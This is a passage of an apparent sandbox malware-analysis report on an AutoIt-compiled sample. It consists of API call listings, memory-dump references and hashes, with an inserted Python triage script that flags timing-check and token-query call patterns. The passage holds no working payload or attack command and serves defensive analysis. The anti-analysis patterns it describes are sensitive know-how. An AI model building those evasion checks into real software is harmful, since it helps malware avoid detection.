                                                            • Associated: 00000000.00000002.1701429773.00000000001A0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701486056.000000000022F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701486056.0000000000255000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701520530.000000000025F000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701533939.0000000000268000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1a0000_7RsDGpyOQk.jbxd
                                                            Similarity
                                                            • API ID: HeapInformationToken$AllocErrorLastProcess
                                                            • String ID:
                                                            • API String ID: 44706859-0
                                                            • Opcode ID: 1df60cafb615ebf7b282059289dd7953fbd0ebb98c11bf32b767f1d8442e0c2a
                                                            • Instruction ID: 939d7c5b383285fc59ee17f0a6f0011685a2affb187b0a39f7c32a055f0dd523
                                                            • Opcode Fuzzy Hash: 1df60cafb615ebf7b282059289dd7953fbd0ebb98c11bf32b767f1d8442e0c2a
                                                            • Instruction Fuzzy Hash: A1F04F71200218BFEB211FA5EC8CEB77BBCEF89764B100035FA49C6150CB719942DA60
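The two call sequences listed above, the QueryPerformanceCounter/Sleep/QueryPerformanceCounter pair at 00205502 and the GetTokenInformation size-probe at 001F8608 and 001F8669, are exactly the shapes a triage script should pull out of this kind of listing. The following Python is an added example, not part of the Joe Sandbox report or of the sample's own code: it parses "APIs" bullet lines into per-function call sequences, flags the two patterns by ordered subsequence, and resolves GetTokenInformation's TokenInformationClass argument from its numeric value against winnt.h (class 3 is TokenPrivileges; TokenIntegrityLevel is 25), which is a useful cross-check on any label a tool prints next to the constant. The input excerpt is constructed to mirror the report's format, and the pattern names are this example's own.

```python
import re
from dataclasses import dataclass
from typing import List, Optional

# Constructed excerpt shaped like the report's "APIs" listings (two function
# blocks plus a subcall line and an argument-less call); not the report's text.
SAMPLE = """\
APIs
• QueryPerformanceCounter.KERNEL32(?,00000000,?,?), ref: 00205502
• QueryPerformanceFrequency.KERNEL32(?,?,?), ref: 00205510
• Sleep.KERNEL32(00000000,?,?), ref: 00205518
• QueryPerformanceCounter.KERNEL32(?,?,?), ref: 00205522
• Sleep.KERNEL32(?,00000000,?), ref: 0020555E
Memory Dump Source
APIs
• GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 001F8669
• GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 001F8673
• GetProcessHeap.KERNEL32(00000008,?,?), ref: 001F8682
• HeapAlloc.KERNEL32(00000000,?), ref: 001F8689
• GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?), ref: 001F869F
  • Part of subcall function 001C0FF6: __CxxThrowException@8.LIBCMT ref: 001C1041
• DeleteObject.GDI32 ref: 001A1401
Memory Dump Source
"""

# One bullet line: [Part of subcall function X:] Name.MODULE[(args)][,] ref: HEX
CALL_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function [0-9A-Fa-f]+:\s*)?"
    r"(?P<name>\S+?)\.(?P<module>\w+)"
    r"(?:\((?P<args>.*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)

# winnt.h TOKEN_INFORMATION_CLASS values relevant to privilege/elevation checks.
TOKEN_INFORMATION_CLASS = {
    1: "TokenUser", 2: "TokenGroups", 3: "TokenPrivileges",
    18: "TokenElevationType", 20: "TokenElevation", 25: "TokenIntegrityLevel",
}

# Ordered API subsequences worth flagging; the names are this example's own.
PATTERNS = {
    # two high-resolution clock reads around a Sleep: a precise-sleep helper
    # and a timing-based debugger check look identical at this level
    "execution-timing": ["QueryPerformanceCounter", "Sleep", "QueryPerformanceCounter"],
    # size probe -> ERROR_INSUFFICIENT_BUFFER -> allocate -> real query
    "token-query-two-call": ["GetTokenInformation", "GetLastError", "HeapAlloc", "GetTokenInformation"],
}


@dataclass
class Call:
    name: str
    module: str
    args: List[str]
    ref: int  # address of the call site


def parse_blocks(text: str) -> List[List[Call]]:
    """Split the listing into per-function call sequences: a block opens at an
    'APIs' header and closes at the next non-bullet line (e.g. 'Memory Dump Source')."""
    blocks: List[List[Call]] = []
    current: Optional[List[Call]] = None
    for line in text.splitlines():
        if line.strip() == "APIs":
            current = []
            blocks.append(current)
            continue
        if current is None:
            continue
        if not line.lstrip().startswith("•"):
            current = None
            continue
        m = CALL_RE.match(line)
        if m:
            raw = m.group("args")
            args = [a.strip() for a in raw.split(",")] if raw else []
            current.append(Call(m.group("name"), m.group("module"), args, int(m.group("ref"), 16)))
    return blocks


def decode_token_class(call: Call) -> Optional[str]:
    """Resolve GetTokenInformation's TokenInformationClass (2nd argument) from its
    numeric value only; any label the tool printed in parentheses is ignored."""
    if call.name != "GetTokenInformation" or len(call.args) < 2:
        return None
    m = re.match(r"([0-9A-Fa-f]{8})", call.args[1])
    if not m:
        return None
    value = int(m.group(1), 16)
    return TOKEN_INFORMATION_CLASS.get(value, f"class {value}")


def is_subsequence(needle: List[str], haystack: List[str]) -> bool:
    """True if needle's items appear in haystack in order (gaps allowed)."""
    it = iter(haystack)
    return all(any(h == n for h in it) for n in needle)


def match_patterns(calls: List[Call]) -> List[str]:
    names = [c.name for c in calls]
    return [p for p, seq in PATTERNS.items() if is_subsequence(seq, names)]


if __name__ == "__main__":
    for calls in parse_blocks(SAMPLE):
        print(f"function near {calls[0].ref:08X}: {match_patterns(calls) or 'no pattern'}")
        for c in calls:
            cls = decode_token_class(c)
            if cls:
                print(f"  {c.ref:08X} GetTokenInformation class -> {cls}")
```

Run against a full report export, the block at 00205502 is reported as execution-timing and the one at 001F8669 as token-query-two-call, with the class constant resolved to TokenPrivileges. The subsequence match deliberately allows gaps, so the GetProcessHeap call between GetLastError and HeapAlloc does not break the match; tighten PATTERNS to adjacent calls if that produces too many hits on real AutoIt runtime code.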
                                                            APIs
                                                            • GetDlgItem.USER32(?,000003E9), ref: 001FC6BA
                                                            • GetWindowTextW.USER32(00000000,?,00000100), ref: 001FC6D1
                                                            • MessageBeep.USER32(00000000), ref: 001FC6E9
                                                            • KillTimer.USER32(?,0000040A), ref: 001FC705
                                                            • EndDialog.USER32(?,00000001), ref: 001FC71F
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1701443654.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                            • Associated: 00000000.00000002.1701429773.00000000001A0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701486056.000000000022F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701486056.0000000000255000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701520530.000000000025F000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701533939.0000000000268000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1a0000_7RsDGpyOQk.jbxd
                                                            Similarity
                                                            • API ID: BeepDialogItemKillMessageTextTimerWindow
                                                            • String ID:
                                                            • API String ID: 3741023627-0
                                                            • Opcode ID: f7c62885120fb297aa8e70c954b783138f6d3831c6f6e45cf464966670208c57
                                                            • Instruction ID: 786e1de88dc8617be931356eb5cd80b973235b8e6486321544fed7cbbedd9dbe
                                                            • Opcode Fuzzy Hash: f7c62885120fb297aa8e70c954b783138f6d3831c6f6e45cf464966670208c57
                                                            • Instruction Fuzzy Hash: 4F01843040030CA7EB306B60EE4EFB67779FB00701F001669B652A15E0DBE069559E80
                                                            APIs
                                                            • EndPath.GDI32(?), ref: 001A13BF
                                                            • StrokeAndFillPath.GDI32(?,?,001DBAD8,00000000,?), ref: 001A13DB
                                                            • SelectObject.GDI32(?,00000000), ref: 001A13EE
                                                            • DeleteObject.GDI32 ref: 001A1401
                                                            • StrokePath.GDI32(?), ref: 001A141C
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1701443654.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                            • Associated: 00000000.00000002.1701429773.00000000001A0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701486056.000000000022F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701486056.0000000000255000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701520530.000000000025F000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701533939.0000000000268000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1a0000_7RsDGpyOQk.jbxd
                                                            Similarity
                                                            • API ID: Path$ObjectStroke$DeleteFillSelect
                                                            • String ID:
                                                            • API String ID: 2625713937-0
                                                            • Opcode ID: de78fb367a35b1e458759eb147f121e893d162f0015634ff90e1eec57d94d115
                                                            • Instruction ID: 3cc830be343e426c5eb5ec3385141b170cfe78dab33515eca7e3f63079c033f1
                                                            • Opcode Fuzzy Hash: de78fb367a35b1e458759eb147f121e893d162f0015634ff90e1eec57d94d115
                                                            • Instruction Fuzzy Hash: 36F0C934004308FBDB655F6AFD0C7583FB5AB42326F14D224E429860F1C775499ADF50
                                                            APIs
                                                              • Part of subcall function 001C0FF6: std::exception::exception.LIBCMT ref: 001C102C
                                                              • Part of subcall function 001C0FF6: __CxxThrowException@8.LIBCMT ref: 001C1041
                                                              • Part of subcall function 001A7F41: _memmove.LIBCMT ref: 001A7F82
                                                              • Part of subcall function 001A7BB1: _memmove.LIBCMT ref: 001A7C0B
                                                            • __swprintf.LIBCMT ref: 001B302D
                                                            Strings
                                                            • \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 001B2EC6
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1701443654.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                            • Associated: 00000000.00000002.1701429773.00000000001A0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701486056.000000000022F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701486056.0000000000255000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701520530.000000000025F000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701533939.0000000000268000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1a0000_7RsDGpyOQk.jbxd
                                                            Similarity
                                                            • API ID: _memmove$Exception@8Throw__swprintfstd::exception::exception
                                                            • String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
                                                            • API String ID: 1943609520-557222456
                                                            • Opcode ID: 6d4d901b00bab7951940facfe84028e094f0d22d338fb8a7d0c5813204f6de7e
                                                            • Instruction ID: 348cec866ef46e438a148676315df81da8b93dde641bf33c9ff38b1cd3a1fccc
                                                            • Opcode Fuzzy Hash: 6d4d901b00bab7951940facfe84028e094f0d22d338fb8a7d0c5813204f6de7e
                                                            • Instruction Fuzzy Hash: 4991AD751087419FC718EF24D895DAFB7A4EFA6750F40091DF4529B2A1EB30EE44CB62
                                                            APIs
                                                            • OleSetContainedObject.OLE32(?,00000001), ref: 001FB981
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1701443654.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                            • Associated: 00000000.00000002.1701429773.00000000001A0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701486056.000000000022F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701486056.0000000000255000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701520530.000000000025F000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701533939.0000000000268000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1a0000_7RsDGpyOQk.jbxd
                                                            Similarity
                                                            • API ID: ContainedObject
                                                            • String ID: AutoIt3GUI$Container$%#
                                                            • API String ID: 3565006973-1342617892
                                                            • Opcode ID: 832165dc61a20081e80a6d9168110a33a193bda800d36b35dbd4b756bf8e1830
                                                            • Instruction ID: fb620fe23d9b481fe178cee45eef3ceab3044b1aa70566e32d345c714f0cd168
                                                            • Opcode Fuzzy Hash: 832165dc61a20081e80a6d9168110a33a193bda800d36b35dbd4b756bf8e1830
                                                            • Instruction Fuzzy Hash: F29149B0614605DFDB24CF28C884A6ABBF9FF49710F14856EEA4ACB291DB70E841CB50
                                                            APIs
                                                            • __startOneArgErrorHandling.LIBCMT ref: 001C52DD
                                                              • Part of subcall function 001D0340: __87except.LIBCMT ref: 001D037B
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1701443654.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                            • Associated: 00000000.00000002.1701429773.00000000001A0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701486056.000000000022F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701486056.0000000000255000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701520530.000000000025F000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701533939.0000000000268000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1a0000_7RsDGpyOQk.jbxd
                                                            Similarity
                                                            • API ID: ErrorHandling__87except__start
                                                            • String ID: pow
                                                            • API String ID: 2905807303-2276729525
                                                            • Opcode ID: e2c5d5aeb8b4f78f04315cff124aaaa6f505bfd7d989aabe240817cbea3da2f4
                                                            • Instruction ID: a7a698158286df06cb7645f39672b49f1336b0e3867d4e612d533f236864427b
                                                            • Opcode Fuzzy Hash: e2c5d5aeb8b4f78f04315cff124aaaa6f505bfd7d989aabe240817cbea3da2f4
                                                            • Instruction Fuzzy Hash: E4518961A0DA01D7CB16B724D901B7F2BD1AB24350F249D5EE4C5823EAEF74ECC4DA46
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1701443654.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                            • Associated: 00000000.00000002.1701429773.00000000001A0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701486056.000000000022F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701486056.0000000000255000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701520530.000000000025F000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701533939.0000000000268000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1a0000_7RsDGpyOQk.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: #$+
                                                            • API String ID: 0-2552117581
                                                            • Opcode ID: 45b0f9dbf6afc93bc462b451a48af2e7c3c6113c72387221d37957a22c1d735e
                                                            • Instruction ID: 9f048511ec93a25a4d13e9c99f0306cbd27c6492d0038e1369125c0cb96939f3
                                                            • Opcode Fuzzy Hash: 45b0f9dbf6afc93bc462b451a48af2e7c3c6113c72387221d37957a22c1d735e
                                                            • Instruction Fuzzy Hash: AC514675106689DFCF16DFA8C488BF97BA5FF6A310F184059EA919B2A0D730DD42C760
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1701443654.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                            • Associated: 00000000.00000002.1701429773.00000000001A0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701486056.000000000022F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701486056.0000000000255000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701520530.000000000025F000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701533939.0000000000268000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1a0000_7RsDGpyOQk.jbxd
                                                            Similarity
                                                            • API ID: _memset$_memmove
                                                            • String ID: ERCP
                                                            • API String ID: 2532777613-1384759551
                                                            • Opcode ID: 564f785efba34381f80357a655a474642a225e4874b3c8fa6fcfd822cfc92831
                                                            • Instruction ID: b7d7c26db7e129572bda7e7eba07e152e46aa09002418e8ade16d0934329b407
                                                            • Opcode Fuzzy Hash: 564f785efba34381f80357a655a474642a225e4874b3c8fa6fcfd822cfc92831
                                                            • Instruction Fuzzy Hash: AE518F71900709DBDB24CF65C881BEABBF4EF24714F20856EEA4ACB241E775D594CB40
                                                            APIs
                                                            • SendMessageW.USER32(00000000,00001009,00000000,?), ref: 002276D0
                                                            • SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 002276E4
                                                            • SendMessageW.USER32(?,00001002,00000000,?), ref: 00227708
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1701443654.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
• Associated: 00000000.00000002.1701429773.00000000001A0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1701486056.000000000022F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1701486056.0000000000255000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1701520530.000000000025F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1701533939.0000000000268000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1a0000_7RsDGpyOQk.jbxd
                                                            Similarity
                                                            • API ID: MessageSend$Window
                                                            • String ID: SysMonthCal32
                                                            • API String ID: 2326795674-1439706946
                                                            • Opcode ID: 5d263f179f78d6c3b0453ae283d55476532a8f05c81f0e892fc962caecbe1729
                                                            • Instruction ID: c42fb2c6a3d2ccb95ef525d91aa76ac4da446d37ec3db858d0e3a330c551cd15
                                                            • Opcode Fuzzy Hash: 5d263f179f78d6c3b0453ae283d55476532a8f05c81f0e892fc962caecbe1729
                                                            • Instruction Fuzzy Hash: 7D21E232514229BBDF22CFA4DC46FEA3B79EF48724F110214FE156B1D0D6B1A861CBA0
                                                            APIs
                                                            • SendMessageW.USER32(00000000,00000180,00000000,?), ref: 00226FAA
                                                            • SendMessageW.USER32(?,00000186,00000000,00000000), ref: 00226FBA
                                                            • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 00226FDF
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1701443654.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
• Associated: 00000000.00000002.1701429773.00000000001A0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1701486056.000000000022F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1701486056.0000000000255000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1701520530.000000000025F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1701533939.0000000000268000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1a0000_7RsDGpyOQk.jbxd
                                                            Similarity
                                                            • API ID: MessageSend$MoveWindow
                                                            • String ID: Listbox
                                                            • API String ID: 3315199576-2633736733
                                                            • Opcode ID: 146c1df0e6b0972b9be218d7c7de2e642f520f86617b04f0de70b46d42f94c93
                                                            • Instruction ID: cab87e4611bea3d74c26df535ae90d167a859a9d2bd37d8508ac1e6ae937ccf8
                                                            • Opcode Fuzzy Hash: 146c1df0e6b0972b9be218d7c7de2e642f520f86617b04f0de70b46d42f94c93
                                                            • Instruction Fuzzy Hash: CE2195326201297FDF218F94EC89FAB376AEF89754F018124F9159B590C6719C61CBA0
                                                            APIs
                                                            • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 002279E1
                                                            • SendMessageW.USER32(?,00000406,00000000,00640000), ref: 002279F6
                                                            • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00227A03
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1701443654.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
• Associated: 00000000.00000002.1701429773.00000000001A0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1701486056.000000000022F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1701486056.0000000000255000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1701520530.000000000025F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1701533939.0000000000268000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1a0000_7RsDGpyOQk.jbxd
                                                            Similarity
                                                            • API ID: MessageSend
                                                            • String ID: msctls_trackbar32
                                                            • API String ID: 3850602802-1010561917
                                                            • Opcode ID: 5854e839fc394ce638f9b4f691cafc678b1b888cdc943d61c75f6e7bbbde2d8a
                                                            • Instruction ID: 1c984c784911b39d99a996d0acb562d5df9aa70426b39a59d39937013680e1c2
                                                            • Opcode Fuzzy Hash: 5854e839fc394ce638f9b4f691cafc678b1b888cdc943d61c75f6e7bbbde2d8a
                                                            • Instruction Fuzzy Hash: EE110A32254219BBDF119FB4DC05FEB77ADEF89764F014519FA41A6090D271D861CB60
                                                            APIs
                                                            • LoadLibraryA.KERNEL32(kernel32.dll,?,001A4C2E), ref: 001A4CA3
                                                            • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 001A4CB5
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1701443654.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
• Associated: 00000000.00000002.1701429773.00000000001A0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1701486056.000000000022F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1701486056.0000000000255000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1701520530.000000000025F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1701533939.0000000000268000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1a0000_7RsDGpyOQk.jbxd
                                                            Similarity
                                                            • API ID: AddressLibraryLoadProc
                                                            • String ID: GetNativeSystemInfo$kernel32.dll
                                                            • API String ID: 2574300362-192647395
                                                            • Opcode ID: d70b46a2e73386c1646bbf98d0103ef4a66c616fcb217bea3759b41e128bf3e1
                                                            • Instruction ID: d67345c8aa8c53bea407704597cac636418ec0083aab43ac949fb3803be23a83
                                                            • Opcode Fuzzy Hash: d70b46a2e73386c1646bbf98d0103ef4a66c616fcb217bea3759b41e128bf3e1
                                                            • Instruction Fuzzy Hash: 7ED0C230510323EFC7704FB0EB0860272F4AF0AB50B10883D9889C2150D7B0C490C610
                                                            APIs
                                                            • LoadLibraryA.KERNEL32(kernel32.dll,?,001A4D2E,?,001A4F4F,?,002662F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 001A4D6F
                                                            • GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 001A4D81
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1701443654.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
• Associated: 00000000.00000002.1701429773.00000000001A0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1701486056.000000000022F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1701486056.0000000000255000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1701520530.000000000025F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1701533939.0000000000268000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1a0000_7RsDGpyOQk.jbxd
                                                            Similarity
                                                            • API ID: AddressLibraryLoadProc
                                                            • String ID: Wow64DisableWow64FsRedirection$kernel32.dll
                                                            • API String ID: 2574300362-3689287502
                                                            • Opcode ID: caaff433c4f8ec1c1a2f5d79df90fc2e141954d582272fc0048f4657ca52a80f
                                                            • Instruction ID: 831ea081ca2590b859dcd2d19a14e3592606f6c892a5d446d9015545f109677e
                                                            • Opcode Fuzzy Hash: caaff433c4f8ec1c1a2f5d79df90fc2e141954d582272fc0048f4657ca52a80f
                                                            • Instruction Fuzzy Hash: 52D01234510713DFD7315FB1E90861676E8AF16752B518839988AD6250E7B4D490CA50
                                                            APIs
                                                            • LoadLibraryA.KERNEL32(kernel32.dll,?,001A4CE1,?), ref: 001A4DA2
                                                            • GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 001A4DB4
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1701443654.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
• Associated: 00000000.00000002.1701429773.00000000001A0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1701486056.000000000022F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1701486056.0000000000255000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1701520530.000000000025F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1701533939.0000000000268000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1a0000_7RsDGpyOQk.jbxd
                                                            Similarity
                                                            • API ID: AddressLibraryLoadProc
                                                            • String ID: Wow64RevertWow64FsRedirection$kernel32.dll
                                                            • API String ID: 2574300362-1355242751
                                                            • Opcode ID: 0f2d8ecc65289ccc8e7ddb8894c0718e3749e43fe380bcb463ad946052c62b1c
                                                            • Instruction ID: abf2ea895af3568b2b94d2cb751c1072b274b919d10331008bf20f7ba5819c1f
                                                            • Opcode Fuzzy Hash: 0f2d8ecc65289ccc8e7ddb8894c0718e3749e43fe380bcb463ad946052c62b1c
                                                            • Instruction Fuzzy Hash: BCD0C230550313DFC7304FB0E90864672E4AF1A349B008839D8C6C6150D7B0C490C610
                                                            APIs
                                                            • LoadLibraryA.KERNEL32(advapi32.dll,?,002212C1), ref: 00221080
                                                            • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00221092
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1701443654.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
• Associated: 00000000.00000002.1701429773.00000000001A0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1701486056.000000000022F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1701486056.0000000000255000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1701520530.000000000025F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1701533939.0000000000268000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1a0000_7RsDGpyOQk.jbxd
                                                            Similarity
                                                            • API ID: AddressLibraryLoadProc
                                                            • String ID: RegDeleteKeyExW$advapi32.dll
                                                            • API String ID: 2574300362-4033151799
                                                            • Opcode ID: 9d5a111ad3b342698f439623f26ed921f5a25ecc34e1b75643c1a37fb301d20c
                                                            • Instruction ID: aa287a8a8326888234b357c3b5a2c0dddf37f83fe10caa263235e7e155732445
                                                            • Opcode Fuzzy Hash: 9d5a111ad3b342698f439623f26ed921f5a25ecc34e1b75643c1a37fb301d20c
                                                            • Instruction Fuzzy Hash: 0BD01230520723EFD7305FB5E91892676F4AF25752F118C39AC89D6550D774C4E0C660
                                                            APIs
                                                            • LoadLibraryA.KERNEL32(kernel32.dll,00000001,00219009,?,0022F910), ref: 00219403
                                                            • GetProcAddress.KERNEL32(00000000,GetModuleHandleExW), ref: 00219415
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1701443654.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
• Associated: 00000000.00000002.1701429773.00000000001A0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1701486056.000000000022F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1701486056.0000000000255000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1701520530.000000000025F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1701533939.0000000000268000.00000002.00000001.01000000.00000003.sdmp
